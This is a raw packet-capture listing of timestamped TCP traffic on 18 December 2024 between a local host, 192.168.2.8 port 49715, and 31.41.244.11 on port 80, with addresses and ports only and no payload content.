Dec 18, 2024 13:38:34.757355928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.757384062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.757396936 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.758279085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.758330107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.758419991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.758467913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.759345055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.759396076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.759500980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.759551048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.760567904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.760620117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.760663033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.760706902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.761612892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.761663914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.761701107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.761749983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.762552977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.762612104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.762660027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.762722015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.763688087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.763741016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.763783932 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.763856888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.764632940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.764687061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.764746904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.764795065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.765675068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.765724897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.765805006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.765857935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.766746998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.766799927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.766851902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.766901970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.767808914 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.767858028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.768057108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.768107891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.768887997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.768937111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.768975019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.769022942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.770041943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.770095110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.770145893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.770191908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.771080971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.771136045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.771306992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.771359921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.772068024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.772114992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.772190094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.772239923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.773164034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.773216963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.773329973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.773380995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.774346113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.774358988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.774400949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.774424076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.775440931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.775492907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.775576115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.775619984 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.776407003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.776458025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.776495934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.776546001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.777497053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.777554035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.777605057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.777652025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.778603077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.778656960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.778723955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.778772116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.779687881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.779741049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.779802084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.779853106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.780785084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.780836105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.780885935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.780930996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.781625986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.781675100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.781717062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.781840086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.782795906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.782852888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.782893896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.782941103 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.784168005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.784219980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.784223080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.784267902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.784924030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.784955978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.784976959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.784997940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.785845041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.785897017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.785934925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.785984039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.786953926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.787030935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.787185907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.787234068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.788284063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.788320065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.788342953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.788357973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.789330959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.789344072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.789395094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.790158033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.790213108 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.790229082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.790271044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.791172028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.791225910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.791296959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.791364908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.792253017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.792305946 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.792355061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.792402029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.793346882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.793406010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.793572903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.793621063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.794404030 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.794471979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.794517040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.794564962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.795423985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.795480967 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.795552969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.795598030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.796478987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.796535969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.796595097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.796638012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.797538996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.797590017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.797729969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.797784090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.798677921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.798729897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.798806906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.798852921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.799761057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.799817085 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.799856901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.799905062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.800759077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.800812006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.800856113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.800905943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.801789999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.801839113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.802191973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.802237988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.802823067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.802874088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.802998066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.803046942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.803894997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.803966045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.940275908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.940342903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.940429926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.940499067 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.940856934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.940880060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.940910101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.940936089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.942028046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.942081928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.942177057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.942229033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.942888021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.942946911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.943000078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.943046093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.944149017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.944226027 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.944240093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.944273949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.945039988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.945100069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.945146084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.945195913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.946086884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.946197033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.946257114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.947190046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.947249889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.947432995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.947496891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.948343039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.948393106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.948451042 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.948501110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.949647903 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.949667931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.949713945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.950368881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.950423002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.950460911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.950515032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.951414108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.951467037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.951550007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.951595068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.952431917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.952490091 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.952558994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.952606916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.953506947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.953558922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.953618050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.953670979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.954735994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.954801083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.954830885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.954890966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.955800056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.955853939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.955862999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.955944061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.956676960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.956748009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.956777096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.956830978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.957756996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.957809925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.957947016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.957997084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.958847046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.958964109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.959001064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.959053040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.959917068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.960017920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.960046053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.960069895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.960933924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.960993052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.961033106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.961081028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.961990118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.962047100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.962086916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.962135077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.963083029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.963128090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.963140965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.963171005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.964524031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.964600086 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.964694977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.964847088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.965509892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.965557098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.965580940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.965842009 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.966445923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.966500044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.966531992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.966574907 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.967426062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.967480898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.967520952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.967571974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.968372107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.968436003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.968492985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.969436884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.969496965 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.969566107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.969608068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.970519066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.970583916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.970594883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.970639944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.971558094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.971616030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.971677065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.971724987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.972630978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.972687960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.972724915 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.972781897 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.973666906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.973722935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.973820925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.973870039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.974798918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.974857092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.974886894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.974932909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.976140976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.976197958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.976288080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.976334095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.977128029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.977191925 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.977250099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.977298975 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.977993011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.978070974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.978257895 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.978305101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.979043961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.979098082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.979131937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.979185104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.980096102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.980155945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.980223894 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.980273008 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.981182098 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.981242895 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.981260061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.981314898 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.982135057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.982194901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.982362032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.982418060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.983205080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.983263016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.983419895 CET	80	49715	31.41.244.11	192.168.2.8
